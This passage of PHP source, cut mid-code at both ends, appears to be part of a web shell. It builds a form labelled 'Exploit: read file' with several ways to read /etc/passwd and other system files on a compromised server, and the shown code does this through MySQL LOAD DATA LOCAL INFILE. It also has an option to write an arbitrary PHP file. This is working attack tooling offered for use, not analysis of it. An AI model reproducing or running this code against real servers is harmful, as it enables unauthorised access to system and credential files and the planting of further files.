$select .= "<option value=\"{$key}\" selected>{$value}</option>\n"; } else { $select .= "<option value=\"{$key}\">{$value}</option>\n"; } } } } $select .= "</select>\n"; return $select; } } $tb->tableheader(); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR</b></td></tr></table>', 'center', 'top'); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>'); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file :</FONT><br>' . $tb->makeinput('Mohajer22', '/etc/passwd') . $tb->makeinput('', Show, 'Mohajer22', 'submit'))); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file id:</FONT><br>' . $tb->makeid('plugin', 'cat /etc/passwd') . $tb->makeinput('', Show, 'plugin', 'submit'))); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file CURL:</FONT><br>' . $tb->makeinput('curl', '/etc/passwd') . $tb->makeinput('', Show, 'curl', 'submit'))); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file copy:</FONT><br>' . $tb->makeinput('copy', '/etc/passwd') . $tb->makeinput('', Show, 'copy', 'submit'))); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file ini_restore:</FONT><br>' . $tb->makeinput('M2', '/etc/passwd') . $tb->makeinput('', Show, 'M2', 'submit'))); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file or dir with imap:</FONT><br>' . $tb->makeimp('switch', '/etc/passwd') . $tb->makeinput('string', '/etc/passwd') . $tb->makeinput('string', 'Show', '', 'submit'))); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>Make file ERORR:</FONT><br>' . $tb->makeinput('ER', 'Mohajer22.php') . $tb->makeinput('ER', 'Write', 'ER', 'submit'))); // read file SQL ( ) // if (empty($_POST['Mohajer22'])) { } else { echo "read file SQL", "<br>"; echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; $file = $_POST['Mohajer22']; $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf"; $mysql_files = explode(':', $mysql_files_str); $sql = array("USE {$mdb}", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A' . time()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '{$file}' INTO TABLE {$tbl} FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM {$tbl} LIMIT 1"); mysql_connect($mhost, $muser, $mpass);